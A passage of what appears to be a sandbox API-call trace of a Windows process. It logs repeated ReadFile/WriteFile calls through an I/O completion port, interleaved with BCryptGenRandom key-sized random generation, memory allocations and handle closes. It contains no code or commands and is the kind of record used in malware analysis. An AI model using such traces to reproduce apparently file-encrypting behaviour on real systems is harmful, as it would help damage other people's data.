(_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.717] free (_Block=0x1ff1930) [0085.717] free (_Block=0x1ff1a40) [0085.717] free (_Block=0x77d908) [0085.717] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.735] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.735] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.735] free (_Block=0x77d800) [0085.735] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.735] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.735] free (_Block=0x1ff1930) [0085.735] free (_Block=0x1ff1a40) [0085.736] free (_Block=0x77d908) [0085.736] WriteFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.737] CloseHandle (hObject=0x3bc) returned 1 [0085.738] free (_Block=0x3df0008) [0085.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.777] ReadFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.778] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.778] CloseHandle (hObject=0x3c0) returned 1 [0085.779] free (_Block=0x1fb18c0) [0085.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.833] CloseHandle (hObject=0x3b8) returned 1 [0085.833] free (_Block=0x3d70048) [0085.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.851] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.852] CloseHandle (hObject=0x3b8) returned 1 [0085.853] free (_Block=0x1fb18c0) [0085.853] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.863] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.863] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.863] free (_Block=0x1ff1e60) [0085.863] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.863] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.863] free (_Block=0x1ff1e60) [0085.863] free (_Block=0x1ff1930) [0085.863] free (_Block=0x77d800) [0085.863] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.879] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.879] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.879] free (_Block=0x1ff1e60) [0085.879] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.879] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.879] free (_Block=0x1ff1e60) [0085.879] free (_Block=0x1ff1930) [0085.879] free (_Block=0x77d800) [0085.879] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0085.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0085.887] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.887] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.887] free (_Block=0x1ff1e60) [0085.887] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.887] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.887] free (_Block=0x1ff1e60) [0085.887] free (_Block=0x1ff1930) [0085.887] free (_Block=0x77d800) [0085.887] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0085.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.955] CloseHandle (hObject=0x3bc) returned 1 [0085.955] free (_Block=0x1ff1e60) [0085.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.972] CloseHandle (hObject=0x3c0) returned 1 [0085.972] free (_Block=0x3d70048) [0085.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0085.980] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.449] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x191f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0086.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.472] CloseHandle (hObject=0x3ac) returned 1 [0086.473] free (_Block=0x3d70048) [0086.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.502] WriteFile (in: hFile=0x3a0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0086.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.524] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.525] CloseHandle (hObject=0x3b8) returned 1 [0086.525] free (_Block=0x1fb18c0) [0086.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0086.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0086.590] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.590] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.590] free (_Block=0x1ff1e60) [0086.590] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.590] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.591] free (_Block=0x1ff1e60) [0086.591] free (_Block=0x1ff1930) [0086.591] free (_Block=0x77d800) [0086.591] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0086.591] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0086.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0086.665] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.665] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.665] free (_Block=0x1ff1e60) [0086.665] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.665] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.666] free (_Block=0x1ff1e60) [0086.666] free (_Block=0x1ff1930) [0086.666] free (_Block=0x77d800) [0086.666] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.667] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0086.700] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0087.252] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.271] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.301] CloseHandle (hObject=0x3b8) returned 1 [0087.302] free (_Block=0x1fb18c0) [0087.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.336] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0087.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.388] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.414] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0087.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.448] WriteFile (in: hFile=0x3c4, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0087.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.454] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0087.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.455] CloseHandle (hObject=0x3a0) returned 1 [0087.456] free (_Block=0x3d70048) [0087.456] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.496] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0087.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0087.500] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.500] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.500] free (_Block=0x1ff1e60) [0087.500] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.500] calloc (_Count=0x82, _Size=0x4) returned 0x3eb0158 [0087.501] free (_Block=0x1ff1e60) [0087.501] free (_Block=0x3eb0158) [0087.505] free (_Block=0x77d800) [0087.505] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 0x0 [0087.506] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0087.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0087.520] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.520] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.520] free (_Block=0x1ff1e60) [0087.520] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.520] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.521] free (_Block=0x1ff1e60) [0087.521] free (_Block=0x1ff1930) [0087.521] free (_Block=0x77d800) [0087.521] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0087.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.537] CloseHandle (hObject=0x3c8) returned 1 [0087.537] free (_Block=0x3e700e8) [0087.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.557] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0087.581] ReadFile (in: hFile=0x3b8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, 